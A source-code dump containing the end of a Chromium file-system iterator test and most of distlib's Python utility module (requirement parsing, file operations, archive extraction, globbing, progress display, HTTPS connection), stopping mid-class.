self._GetStableChannelInfo(25),
self._GetStableChannelInfo(26),
self._GetStableChannelInfo(27),
self._GetStableChannelInfo(28),
self._GetChannelInfo('stable'),
self._GetChannelInfo('beta'),
self._GetChannelInfo('dev')], iterations)
def testDescending(self):
# Start at |master|, and the callback fails immediately. No file systems
# are successfully processed, so Descending() will return None.
iterations, callback = _GetIterationTracker('master')
self.assertEqual(
self._iterator.Descending(self._GetChannelInfo('master'), callback),
None)
self.assertEqual([], iterations)
# Start at |master|, and the callback fails at |dev|. Last good iteration
# should be |master|.
iterations, callback = _GetIterationTracker(
self._GetChannelInfo('dev').version)
self.assertEqual(
self._iterator.Descending(self._GetChannelInfo('master'), callback),
self._GetChannelInfo('master'))
self.assertEqual([self._GetChannelInfo('master')], iterations)
# Start at |master|, and then move from |dev| down to |stable| at version 5.
# Total: 28 file systems.
iterations, callback = _GetIterationTracker(0)
self.assertEqual(
self._iterator.Descending(self._GetChannelInfo('master'), callback),
self._GetStableChannelInfo(5))
self.assertEqual(len(iterations), 28)
# Start at the latest version of |stable|, and move down to |stable| at
# version 5. Total: 25 file systems.
iterations, callback = _GetIterationTracker(0)
self.assertEqual(
self._iterator.Descending(self._GetChannelInfo('stable'), callback),
self._GetStableChannelInfo(5))
self.assertEqual(len(iterations), 25)
# Start at |dev| and iterate down through |stable| versions. The callback
# fails at version 10. Total: 18 file systems.
iterations, callback = _GetIterationTracker(10)
self.assertEqual(
self._iterator.Descending(self._GetChannelInfo('dev'), callback),
self._GetStableChannelInfo(11))
self.assertEqual([self._GetChannelInfo('dev'),
self._GetChannelInfo('beta'),
self._GetChannelInfo('stable'),
self._GetStableChannelInfo(28),
self._GetStableChannelInfo(27),
self._GetStableChannelInfo(26),
self._GetStableChannelInfo(25),
self._GetStableChannelInfo(24),
self._GetStableChannelInfo(23),
self._GetStableChannelInfo(22),
self._GetStableChannelInfo(21),
self._GetStableChannelInfo(20),
self._GetStableChannelInfo(19),
self._GetStableChannelInfo(18),
self._GetStableChannelInfo(17),
self._GetStableChannelInfo(16),
self._GetStableChannelInfo(15),
self._GetStableChannelInfo(14),
self._GetStableChannelInfo(13),
self._GetStableChannelInfo(12),
self._GetStableChannelInfo(11)], iterations)
if __name__ == '__main__':
unittest.main()
|
s20121035/rk3288_android5.1_repo
|
external/chromium_org/chrome/common/extensions/docs/server2/host_file_system_iterator_test.py
|
Python
|
gpl-3.0
| 8,159
|
#
# Copyright (C) 2012-2013 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import shutil
import socket
import ssl
import sys
import tarfile
import tempfile
import time
import zipfile
from . import DistlibException
from .compat import (string_types, text_type, shutil, raw_input,
cache_from_source, urlopen, httplib, xmlrpclib, splittype,
HTTPHandler, HTTPSHandler as BaseHTTPSHandler,
URLError, match_hostname, CertificateError)
logger = logging.getLogger(__name__)
class Container(object):
"""
A generic container for when multiple values need to be returned
"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
#
# Requirement parsing code for name + optional constraints + optional extras
#
# e.g. 'foo [bar, baz] >= 1.2, < 2.0' (extras, if any, precede constraints)
#
# The regex can seem a bit hairy, so we build it up out of smaller pieces
# which are manageable.
#
COMMA = r'\s*,\s*'
COMMA_RE = re.compile(COMMA)
IDENT = r'(\w|[.-])+'
RELOP = '([<>=!]=)|[<>]'
#
# The first relop is optional - if absent, will be taken as '=='
#
BARE_CONSTRAINTS = ('(' + RELOP + r')?\s*(' + IDENT + ')(' + COMMA + '(' +
RELOP + r')\s*(' + IDENT + '))*')
#
# Either the bare constraints or the bare constraints in parentheses
#
CONSTRAINTS = (r'\(\s*(?P<c1>' + BARE_CONSTRAINTS + r')\s*\)|(?P<c2>' +
               BARE_CONSTRAINTS + r'\s*)')
EXTRA_LIST = IDENT + '(' + COMMA + IDENT + ')*'
EXTRAS = r'\[\s*(?P<ex>' + EXTRA_LIST + r')?\s*\]'
REQUIREMENT = ('(?P<dn>' + IDENT + r')\s*(' + EXTRAS + r'\s*)?(\s*' +
CONSTRAINTS + ')?$')
REQUIREMENT_RE = re.compile(REQUIREMENT)
#
# Used to scan through the constraints
#
RELOP_IDENT = '(?P<op>' + RELOP + r')\s*(?P<vn>' + IDENT + ')'
RELOP_IDENT_RE = re.compile(RELOP_IDENT)
def parse_requirement(s):
def get_constraint(m):
d = m.groupdict()
return d['op'], d['vn']
result = None
m = REQUIREMENT_RE.match(s)
if m:
d = m.groupdict()
name = d['dn']
cons = d['c1'] or d['c2']
if not cons:
cons = None
constr = ''
rs = d['dn']
else:
if cons[0] not in '<>!=':
cons = '==' + cons
iterator = RELOP_IDENT_RE.finditer(cons)
cons = [get_constraint(m) for m in iterator]
rs = '%s (%s)' % (name, ', '.join(['%s %s' % con for con in cons]))
if not d['ex']:
extras = None
else:
extras = COMMA_RE.split(d['ex'])
result = Container(name=name, constraints=cons, extras=extras,
requirement=rs, source=s)
return result
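# A minimal usage sketch for parse_requirement(); per REQUIREMENT above,
# extras (if any) come before the version constraints:
def _demo_parse_requirement():
    r = parse_requirement('foo [bar, baz] >= 1.2, < 2.0')
    assert r.name == 'foo'
    assert r.extras == ['bar', 'baz']
    assert r.constraints == [('>=', '1.2'), ('<', '2.0')]
    assert r.requirement == 'foo (>= 1.2, < 2.0)'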
def get_resources_dests(resources_root, rules):
"""Find destinations for resources files"""
def get_rel_path(base, path):
# normalizes and returns a lstripped-/-separated path
base = base.replace(os.path.sep, '/')
path = path.replace(os.path.sep, '/')
assert path.startswith(base)
return path[len(base):].lstrip('/')
destinations = {}
for base, suffix, dest in rules:
prefix = os.path.join(resources_root, base)
for abs_base in iglob(prefix):
abs_glob = os.path.join(abs_base, suffix)
for abs_path in iglob(abs_glob):
resource_file = get_rel_path(resources_root, abs_path)
if dest is None: # remove the entry if it was here
destinations.pop(resource_file, None)
else:
rel_path = get_rel_path(abs_base, abs_path)
rel_dest = dest.replace(os.path.sep, '/').rstrip('/')
destinations[resource_file] = rel_dest + '/' + rel_path
return destinations
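# A sketch of the rules format (hypothetical layout): each rule is a
# (base, glob-suffix, dest) triple; dest=None removes matches added by an
# earlier rule.
def _demo_get_resources_dests():
    rules = [('images', '*.png', 'static/img')]
    # With resources/images/logo.png on disk, this would return
    # {'images/logo.png': 'static/img/logo.png'}.
    return get_resources_dests('resources', rules)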
def in_venv():
if hasattr(sys, 'real_prefix'):
# virtualenv venvs
result = True
else:
# PEP 405 venvs
result = sys.prefix != getattr(sys, 'base_prefix', sys.prefix)
return result
def get_executable():
if sys.platform == 'darwin' and ('__VENV_LAUNCHER__'
in os.environ):
result = os.environ['__VENV_LAUNCHER__']
else:
result = sys.executable
return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
p = prompt
while True:
s = raw_input(p)
p = prompt
if not s and default:
s = default
if s:
c = s[0].lower()
if c in allowed_chars:
break
if error_prompt:
p = '%c: %s\n%s' % (c, error_prompt, prompt)
return c
@contextlib.contextmanager
def tempdir():
td = tempfile.mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
@contextlib.contextmanager
def chdir(d):
cwd = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def socket_timeout(seconds=15):
cto = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(seconds)
yield
finally:
socket.setdefaulttimeout(cto)
class cached_property(object):
def __init__(self, func):
self.func = func
#for attr in ('__name__', '__module__', '__doc__'):
# setattr(self, attr, getattr(func, attr, None))
def __get__(self, obj, type=None):
if obj is None:
return self
value = self.func(obj)
object.__setattr__(obj, self.func.__name__, value)
#obj.__dict__[self.func.__name__] = value = self.func(obj)
return value
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem.
The path is split on '/' and put back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == '/':
return pathname
if not pathname:
return pathname
if pathname[0] == '/':
raise ValueError("path '%s' cannot be absolute" % pathname)
if pathname[-1] == '/':
raise ValueError("path '%s' cannot end with '/'" % pathname)
paths = pathname.split('/')
while os.curdir in paths:
paths.remove(os.curdir)
if not paths:
return os.curdir
return os.path.join(*paths)
class FileOperator(object):
def __init__(self, dry_run=False):
self.dry_run = dry_run
self.ensured = set()
self._init_record()
def _init_record(self):
self.record = False
self.files_written = set()
self.dirs_created = set()
def record_as_written(self, path):
if self.record:
self.files_written.add(path)
def newer(self, source, target):
"""Tell if the target is newer than the source.
Returns true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't.
Returns false if both exist and 'target' is the same age or younger
than 'source'. Raise PackagingFileError if 'source' does not exist.
Note that this test is not very accurate: files created in the same
second will have the same "age".
"""
if not os.path.exists(source):
raise DistlibException("file '%r' does not exist" %
os.path.abspath(source))
if not os.path.exists(target):
return True
return os.stat(source).st_mtime > os.stat(target).st_mtime
def copy_file(self, infile, outfile):
"""Copy a file respecting dry-run and force flags.
"""
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying %s to %s', infile, outfile)
if not self.dry_run:
shutil.copyfile(infile, outfile)
if self.record:
self.files_written.add(outfile)
def copy_stream(self, instream, outfile, encoding=None):
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying stream %s to %s', instream, outfile)
if not self.dry_run:
if encoding is None:
outstream = open(outfile, 'wb')
else:
outstream = codecs.open(outfile, 'w', encoding=encoding)
try:
shutil.copyfileobj(instream, outstream)
finally:
outstream.close()
if self.record:
self.files_written.add(outfile)
def write_binary_file(self, path, data):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data)
if self.record:
self.files_written.add(path)
def write_text_file(self, path, data, encoding):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data.encode(encoding))
if self.record:
self.files_written.add(path)
def set_mode(self, bits, mask, files):
if os.name == 'posix':
# Set the executable bits (owner, group, and world) on
# all the files specified.
for f in files:
if self.dry_run:
logger.info("changing mode of %s", f)
else:
mode = (os.stat(f).st_mode | bits) & mask
logger.info("changing mode of %s to %o", f, mode)
os.chmod(f, mode)
set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
def ensure_dir(self, path):
path = os.path.abspath(path)
if path not in self.ensured and not os.path.exists(path):
self.ensured.add(path)
d, f = os.path.split(path)
self.ensure_dir(d)
logger.info('Creating %s' % path)
if not self.dry_run:
os.mkdir(path)
if self.record:
self.dirs_created.add(path)
def byte_compile(self, path, optimize=False, force=False, prefix=None):
dpath = cache_from_source(path, not optimize)
logger.info('Byte-compiling %s to %s', path, dpath)
if not self.dry_run:
if force or self.newer(path, dpath):
if not prefix:
diagpath = None
else:
assert path.startswith(prefix)
diagpath = path[len(prefix):]
py_compile.compile(path, dpath, diagpath, True) # raise on error
if self.record:
self.files_written.add(dpath)
return dpath
def ensure_removed(self, path):
if os.path.exists(path):
if os.path.isdir(path) and not os.path.islink(path):
logger.debug('Removing directory tree at %s', path)
if not self.dry_run:
shutil.rmtree(path)
if self.record:
if path in self.dirs_created:
self.dirs_created.remove(path)
else:
if os.path.islink(path):
s = 'link'
else:
s = 'file'
logger.debug('Removing %s %s', s, path)
if not self.dry_run:
os.remove(path)
if self.record:
if path in self.files_written:
self.files_written.remove(path)
def is_writable(self, path):
result = False
while not result:
if os.path.exists(path):
result = os.access(path, os.W_OK)
break
parent = os.path.dirname(path)
if parent == path:
break
path = parent
return result
def commit(self):
"""
Commit recorded changes, turn off recording, return
changes.
"""
assert self.record
result = self.files_written, self.dirs_created
self._init_record()
return result
def rollback(self):
if not self.dry_run:
for f in list(self.files_written):
if os.path.exists(f):
os.remove(f)
# dirs should all be empty now, except perhaps for
# __pycache__ subdirs
# reverse so that subdirs appear before their parents
dirs = sorted(self.dirs_created, reverse=True)
for d in dirs:
flist = os.listdir(d)
if flist:
assert flist == ['__pycache__']
sd = os.path.join(d, flist[0])
os.rmdir(sd)
os.rmdir(d) # should fail if non-empty
self._init_record()
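# A dry-run sketch for FileOperator: with dry_run=True nothing touches the
# filesystem, but recorded paths can still be inspected via commit().
def _demo_file_operator():
    fo = FileOperator(dry_run=True)
    fo.record = True
    fo.write_text_file('/tmp/demo/hello.txt', u'hi', 'utf-8')
    files_written, dirs_created = fo.commit()
    assert '/tmp/demo/hello.txt' in files_written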
def resolve(module_name, dotted_path):
if module_name in sys.modules:
mod = sys.modules[module_name]
else:
mod = __import__(module_name)
if dotted_path is None:
result = mod
else:
parts = dotted_path.split('.')
result = getattr(mod, parts.pop(0))
for p in parts:
result = getattr(result, p)
return result
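# A minimal sketch for resolve(): look up a dotted attribute path on a module
# (logging is already imported at the top of this file).
def _demo_resolve():
    get_logger = resolve('logging', 'getLogger')
    assert get_logger is logging.getLogger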
class ExportEntry(object):
def __init__(self, name, prefix, suffix, flags):
self.name = name
self.prefix = prefix
self.suffix = suffix
self.flags = flags
@cached_property
def value(self):
return resolve(self.prefix, self.suffix)
def __repr__(self):
return '<ExportEntry %s = %s:%s %s>' % (self.name, self.prefix,
self.suffix, self.flags)
def __eq__(self, other):
if not isinstance(other, ExportEntry):
result = False
else:
result = (self.name == other.name and
self.prefix == other.prefix and
self.suffix == other.suffix and
self.flags == other.flags)
return result
__hash__ = object.__hash__
ENTRY_RE = re.compile(r'''(?P<name>(\w|[-.])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
\s*(\[\s*(?P<flags>\w+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
''', re.VERBOSE)
def get_export_entry(specification):
m = ENTRY_RE.search(specification)
if not m:
result = None
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
else:
d = m.groupdict()
name = d['name']
path = d['callable']
colons = path.count(':')
if colons == 0:
prefix, suffix = path, None
else:
if colons != 1:
raise DistlibException('Invalid specification '
'%r' % specification)
prefix, suffix = path.split(':')
flags = d['flags']
if flags is None:
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
flags = []
else:
flags = [f.strip() for f in flags.split(',')]
result = ExportEntry(name, prefix, suffix, flags)
return result
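# A usage sketch for get_export_entry(); 'mypkg.cli:run' is a hypothetical
# callable in 'name = package.module:attribute [flags]' form.
def _demo_get_export_entry():
    entry = get_export_entry('main = mypkg.cli:run')
    assert entry.name == 'main'
    assert entry.prefix == 'mypkg.cli'
    assert entry.suffix == 'run'
    assert entry.flags == []
    # entry.value would import mypkg.cli and return its 'run' attribute.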
def get_cache_base(suffix=None):
"""
Return the default base location for distlib caches. If the directory does
not exist, it is created. Use the suffix provided for the base directory,
and default to '.distlib' if it isn't provided.
On Windows, if LOCALAPPDATA is defined in the environment, then it is
assumed to be a directory, and will be the parent directory of the result.
On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
directory - using os.expanduser('~') - will be the parent directory of
the result.
The result is just the directory '.distlib' in the parent directory as
determined above, or with the name specified with ``suffix``.
"""
if suffix is None:
suffix = '.distlib'
if os.name == 'nt' and 'LOCALAPPDATA' in os.environ:
result = os.path.expandvars('$localappdata')
else:
# Assume posix, or old Windows
result = os.path.expanduser('~')
result = os.path.join(result, suffix)
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if not os.path.isdir(result):
os.makedirs(result)
return result
def path_to_cache_dir(path):
"""
Convert an absolute path to a directory name for use in a cache.
The algorithm used is:
#. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
#. Any occurrence of ``os.sep`` is replaced with ``'--'``.
#. ``'.cache'`` is appended.
"""
d, p = os.path.splitdrive(os.path.abspath(path))
if d:
d = d.replace(':', '---')
p = p.replace(os.sep, '--')
return d + p + '.cache'
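# A quick sketch of the mapping on POSIX (on Windows a drive 'C:' would
# additionally become 'C---'):
def _demo_path_to_cache_dir():
    if os.sep == '/':
        assert (path_to_cache_dir('/home/user/project') ==
                '--home--user--project.cache')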
def ensure_slash(s):
if not s.endswith('/'):
return s + '/'
return s
def parse_credentials(netloc):
username = password = None
if '@' in netloc:
prefix, netloc = netloc.split('@', 1)
if ':' not in prefix:
username = prefix
else:
username, password = prefix.split(':', 1)
return username, password, netloc
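# A minimal sketch for parse_credentials() on 'user:password@host' netlocs
# (hostnames here are hypothetical):
def _demo_parse_credentials():
    assert (parse_credentials('bob:secret@pypi.example.com') ==
            ('bob', 'secret', 'pypi.example.com'))
    assert (parse_credentials('pypi.example.com') ==
            (None, None, 'pypi.example.com'))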
def get_process_umask():
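    # os.umask sets a new mask and returns the previous one, so set a
    # throwaway value, capture the old mask, then restore it.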
result = os.umask(0o22)
os.umask(result)
return result
def is_string_sequence(seq):
result = True
i = None
for i, s in enumerate(seq):
if not isinstance(s, string_types):
result = False
break
assert i is not None
return result
PROJECT_NAME_AND_VERSION = re.compile('([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-'
'([0-9][a-z0-9_.+-]*)', re.I)
PYTHON_VERSION = re.compile(r'-py(\d\.?\d?)$')
def split_filename(filename, project_name=None):
"""
Extract name, version, python version from a filename (no extension)
Return name, version, pyver or None
"""
result = None
pyver = None
m = PYTHON_VERSION.search(filename)
if m:
pyver = m.group(1)
filename = filename[:m.start()]
if project_name and len(filename) > len(project_name) + 1:
m = re.match(re.escape(project_name) + r'\b', filename)
if m:
n = m.end()
result = filename[:n], filename[n + 1:], pyver
if result is None:
m = PROJECT_NAME_AND_VERSION.match(filename)
if m:
result = m.group(1), m.group(3), pyver
return result
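# A worked sketch for split_filename() (extension already stripped):
def _demo_split_filename():
    assert split_filename('foo-1.0-py2.7') == ('foo', '1.0', '2.7')
    assert split_filename('foo-1.0') == ('foo', '1.0', None)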
#
# Extended metadata functionality
#
def _get_external_data(url):
result = {}
try:
# urlopen might fail if it runs into redirections,
# because of Python issue #13696. Fixed in locators
# using a custom redirect handler.
resp = urlopen(url)
headers = resp.info()
if headers.get('Content-Type') != 'application/json':
logger.debug('Unexpected response for JSON request')
else:
reader = codecs.getreader('utf-8')(resp)
#data = reader.read().decode('utf-8')
#result = json.loads(data)
result = json.load(reader)
except Exception as e:
logger.exception('Failed to get external data for %s: %s', url, e)
return result
def get_project_data(name):
url = ('https://www.red-dove.com/pypi/projects/'
'%s/%s/project.json' % (name[0].upper(), name))
result = _get_external_data(url)
return result
def get_package_data(dist):
name, version = dist.name, dist.version
url = ('https://www.red-dove.com/pypi/projects/'
'%s/%s/package-%s.json' % (name[0].upper(), name, version))
result = _get_external_data(url)
if 'metadata' in result and dist.metadata:
update_metadata(dist.metadata, result)
return result
RENAMES = { # Temporary
'classifiers': 'Classifier',
'use_2to3': None,
'use_2to3_fixers': None,
'test_suite': None,
}
def update_metadata(metadata, pkginfo):
# update dist's metadata from received package data
assert metadata
assert 'metadata' in pkginfo
for k, v in pkginfo['metadata'].items():
k = k.replace('-', '_')
k = RENAMES.get(k, k)
if k is not None:
metadata[k] = v
metadata.set_metadata_version()
if 'requirements' in pkginfo:
metadata.dependencies = pkginfo['requirements']
#
# Simple event pub/sub
#
class EventMixin(object):
"""
A very simple publish/subscribe system.
"""
def __init__(self):
self._subscribers = {}
def add(self, event, subscriber, append=True):
"""
Add a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be added (and called when the
event is published).
:param append: Whether to append or prepend the subscriber to an
existing subscriber list for the event.
"""
subs = self._subscribers
if event not in subs:
subs[event] = deque([subscriber])
else:
sq = subs[event]
if append:
sq.append(subscriber)
else:
sq.appendleft(subscriber)
def remove(self, event, subscriber):
"""
Remove a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be removed.
"""
subs = self._subscribers
if event not in subs:
raise ValueError('No subscribers: %r' % event)
subs[event].remove(subscriber)
def get_subscribers(self, event):
"""
Return an iterator for the subscribers for an event.
:param event: The event to return subscribers for.
"""
return iter(self._subscribers.get(event, ()))
def publish(self, event, *args, **kwargs):
"""
Publish a event and return a list of values returned by its
subscribers.
:param event: The event to publish.
:param args: The positional arguments to pass to the event's
subscribers.
:param kwargs: The keyword arguments to pass to the event's
subscribers.
"""
result = []
for subscriber in self.get_subscribers(event):
try:
value = subscriber(event, *args, **kwargs)
except Exception:
logger.exception('Exception during event publication')
value = None
result.append(value)
logger.debug('publish %s: args = %s, kwargs = %s, result = %s',
event, args, kwargs, result)
return result
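# A minimal pub/sub sketch: subscribers are invoked as
# subscriber(event, *args, **kwargs) and publish() collects their results.
def _demo_event_mixin():
    bus = EventMixin()
    bus.add('ping', lambda event, x: x + 1)
    assert bus.publish('ping', 41) == [42]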
#
# Simple sequencing
#
class Sequencer(object):
def __init__(self):
self._preds = {}
self._succs = {}
self._nodes = set() # nodes with no preds/succs
def add_node(self, node):
self._nodes.add(node)
def remove_node(self, node):
self._nodes.remove(node)
def add(self, pred, succ):
assert pred != succ
self._preds.setdefault(succ, set()).add(pred)
self._succs.setdefault(pred, set()).add(succ)
def remove(self, pred, succ):
assert pred != succ
try:
preds = self._preds[succ]
succs = self._succs[pred]
except KeyError:
raise ValueError('%r not a successor of anything' % succ)
try:
preds.remove(pred)
succs.remove(succ)
except KeyError:
raise ValueError('%r not a successor of %r' % (succ, pred))
def is_step(self, step):
return (step in self._preds or step in self._succs or
step in self._nodes)
def get_steps(self, final):
if not self.is_step(final):
raise ValueError('Unknown: %r' % final)
result = []
todo = []
seen = set()
todo.append(final)
while todo:
step = todo.pop(0)
if step in seen:
# if a step was already seen,
# move it to the end (so it will appear earlier
# when reversed on return) ... but not for the
# final step, as that would be confusing for
# users
if step != final:
result.remove(step)
result.append(step)
else:
seen.add(step)
result.append(step)
preds = self._preds.get(step, ())
todo.extend(preds)
return reversed(result)
@property
def strong_connections(self):
#http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
index_counter = [0]
stack = []
lowlinks = {}
index = {}
result = []
graph = self._succs
def strongconnect(node):
# set the depth index for this node to the smallest unused index
index[node] = index_counter[0]
lowlinks[node] = index_counter[0]
index_counter[0] += 1
stack.append(node)
# Consider successors
try:
successors = graph[node]
except Exception:
successors = []
for successor in successors:
if successor not in lowlinks:
# Successor has not yet been visited
strongconnect(successor)
lowlinks[node] = min(lowlinks[node],lowlinks[successor])
elif successor in stack:
# the successor is in the stack and hence in the current
# strongly connected component (SCC)
lowlinks[node] = min(lowlinks[node],index[successor])
# If `node` is a root node, pop the stack and generate an SCC
if lowlinks[node] == index[node]:
connected_component = []
while True:
successor = stack.pop()
connected_component.append(successor)
if successor == node: break
component = tuple(connected_component)
# storing the result
result.append(component)
for node in graph:
if node not in lowlinks:
strongconnect(node)
return result
@property
def dot(self):
result = ['digraph G {']
for succ in self._preds:
preds = self._preds[succ]
for pred in preds:
result.append(' %s -> %s;' % (pred, succ))
for node in self._nodes:
result.append(' %s;' % node)
result.append('}')
return '\n'.join(result)
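# A minimal sketch for Sequencer: get_steps() yields each step's
# predecessors before the step itself.
def _demo_sequencer():
    seq = Sequencer()
    seq.add('build', 'test')
    seq.add('test', 'deploy')
    assert list(seq.get_steps('deploy')) == ['build', 'test', 'deploy']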
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = ('.tar.gz', '.tar.bz2', '.tar', '.zip',
'.tgz', '.tbz', '.whl')
def unarchive(archive_filename, dest_dir, format=None, check=True):
def check_path(path):
if not isinstance(path, text_type):
path = path.decode('utf-8')
p = os.path.abspath(os.path.join(dest_dir, path))
if not p.startswith(dest_dir) or p[plen] != os.sep:
raise ValueError('path outside destination: %r' % p)
dest_dir = os.path.abspath(dest_dir)
plen = len(dest_dir)
archive = None
if format is None:
if archive_filename.endswith(('.zip', '.whl')):
format = 'zip'
elif archive_filename.endswith(('.tar.gz', '.tgz')):
format = 'tgz'
mode = 'r:gz'
elif archive_filename.endswith(('.tar.bz2', '.tbz')):
format = 'tbz'
mode = 'r:bz2'
elif archive_filename.endswith('.tar'):
format = 'tar'
mode = 'r'
else:
raise ValueError('Unknown format for %r' % archive_filename)
try:
if format == 'zip':
archive = zipfile.ZipFile(archive_filename, 'r')
if check:
names = archive.namelist()
for name in names:
check_path(name)
else:
archive = tarfile.open(archive_filename, mode)
if check:
names = archive.getnames()
for name in names:
check_path(name)
if format != 'zip' and sys.version_info[0] < 3:
# See Python issue 17153. If the dest path contains Unicode,
# tarfile extraction fails on Python 2.x if a member path name
# contains non-ASCII characters - it leads to an implicit
# bytes -> unicode conversion using ASCII to decode.
for tarinfo in archive.getmembers():
if not isinstance(tarinfo.name, text_type):
tarinfo.name = tarinfo.name.decode('utf-8')
archive.extractall(dest_dir)
finally:
if archive:
archive.close()
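# Editor's sketch (not in the original module): unarchive() infers the
# format from the file extension and, with check=True, raises ValueError
# for member paths that would escape dest_dir (e.g. '../../etc/passwd').
# The file names below are hypothetical.
def _example_unarchive():
    unarchive('project-1.0.tar.gz', '/tmp/unpacked')          # handled as tgz
    unarchive('project-1.0-py2-none-any.whl', '/tmp/wheel')   # .whl as zip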
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with zipfile.ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
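# Editor's sketch: zip_dir() returns an in-memory BytesIO, which is handy
# for uploading a tree without writing a temporary file.  Path hypothetical.
def _example_zip_dir():
    buf = zip_dir('/tmp/unpacked')
    data = buf.getvalue()     # the raw bytes of the zip archive
    return data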
#
# Simple progress bar
#
UNITS = ('', 'K', 'M', 'G', 'T', 'P')
class Progress(object):
unknown = 'UNKNOWN'
def __init__(self, minval=0, maxval=100):
assert maxval is None or maxval >= minval
self.min = self.cur = minval
self.max = maxval
self.started = None
self.elapsed = 0
self.done = False
def update(self, curval):
assert self.min <= curval
assert self.max is None or curval <= self.max
self.cur = curval
now = time.time()
if self.started is None:
self.started = now
else:
self.elapsed = now - self.started
def increment(self, incr):
assert incr >= 0
self.update(self.cur + incr)
def start(self):
self.update(self.min)
return self
def stop(self):
if self.max is not None:
self.update(self.max)
self.done = True
@property
def maximum(self):
return self.unknown if self.max is None else self.max
@property
def percentage(self):
if self.done:
result = '100 %'
elif self.max is None:
result = ' ?? %'
else:
v = 100.0 * (self.cur - self.min) / (self.max - self.min)
result = '%3d %%' % v
return result
def format_duration(self, duration):
        if ((duration <= 0) and self.max is None) or self.cur == self.min:
result = '??:??:??'
#elif duration < 1:
# result = '--:--:--'
else:
result = time.strftime('%H:%M:%S', time.gmtime(duration))
return result
@property
def ETA(self):
if self.done:
prefix = 'Done'
t = self.elapsed
#import pdb; pdb.set_trace()
else:
prefix = 'ETA '
if self.max is None:
t = -1
elif self.elapsed == 0 or (self.cur == self.min):
t = 0
else:
#import pdb; pdb.set_trace()
t = float(self.max - self.min)
t /= self.cur - self.min
t = (t - 1) * self.elapsed
return '%s: %s' % (prefix, self.format_duration(t))
@property
def speed(self):
if self.elapsed == 0:
result = 0.0
else:
result = (self.cur - self.min) / self.elapsed
for unit in UNITS:
if result < 1000:
break
result /= 1000.0
return '%d %sB/s' % (result, unit)
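# Editor's sketch: driving the Progress API above.  update() feeds the
# read-only percentage / ETA / speed properties; stop() pins it at 100 %.
def _example_progress():
    p = Progress(maxval=1000).start()
    for done in (250, 500, 750, 1000):
        p.update(done)
        print(p.percentage, p.ETA, p.speed)
    p.stop()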
#
# Glob functionality
#
RICH_GLOB = re.compile(r'\{([^}]*)\}')
_CHECK_RECURSIVE_GLOB = re.compile(r'[^/\\,{]\*\*|\*\*[^/\\,}]')
_CHECK_MISMATCH_SET = re.compile(r'^[^{]*\}|\{[^}]*$')
def iglob(path_glob):
"""Extended globbing function that supports ** and {opt1,opt2,opt3}."""
if _CHECK_RECURSIVE_GLOB.search(path_glob):
msg = """invalid glob %r: recursive glob "**" must be used alone"""
raise ValueError(msg % path_glob)
if _CHECK_MISMATCH_SET.search(path_glob):
msg = """invalid glob %r: mismatching set marker '{' or '}'"""
raise ValueError(msg % path_glob)
return _iglob(path_glob)
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(','):
for path in _iglob(''.join((prefix, item, suffix))):
yield path
else:
if '**' not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split('**', 1)
if prefix == '':
prefix = '.'
if radical == '':
radical = '*'
else:
# we support both
radical = radical.lstrip('/')
radical = radical.lstrip('\\')
for path, dir, files in os.walk(prefix):
path = os.path.normpath(path)
for file in _iglob(os.path.join(path, radical)):
yield file
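# Editor's sketch: iglob() accepts '**' recursion and {a,b} alternation
# on top of the stdlib glob syntax.  The pattern below is hypothetical.
def _example_iglob():
    for path in iglob('src/**/*.{py,txt}'):
        print(path)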
#
# HTTPSConnection which verifies certificates/matches domains
#
class HTTPSConnection(httplib.HTTPSConnection):
ca_certs = None # set this to the path to the certs file (.pem)
check_domain = True # only used if ca_certs is not None
# noinspection PyPropertyAccess
def connect(self):
sock = socket.create_connection((self.host, self.port), self.timeout)
if getattr(self, '_tunnel_host', False):
self.sock = sock
self._tunnel()
if not hasattr(ssl, 'SSLContext'):
# For 2.x
if self.ca_certs:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
cert_reqs=cert_reqs,
ssl_version=ssl.PROTOCOL_SSLv23,
ca_certs=self.ca_certs)
else:
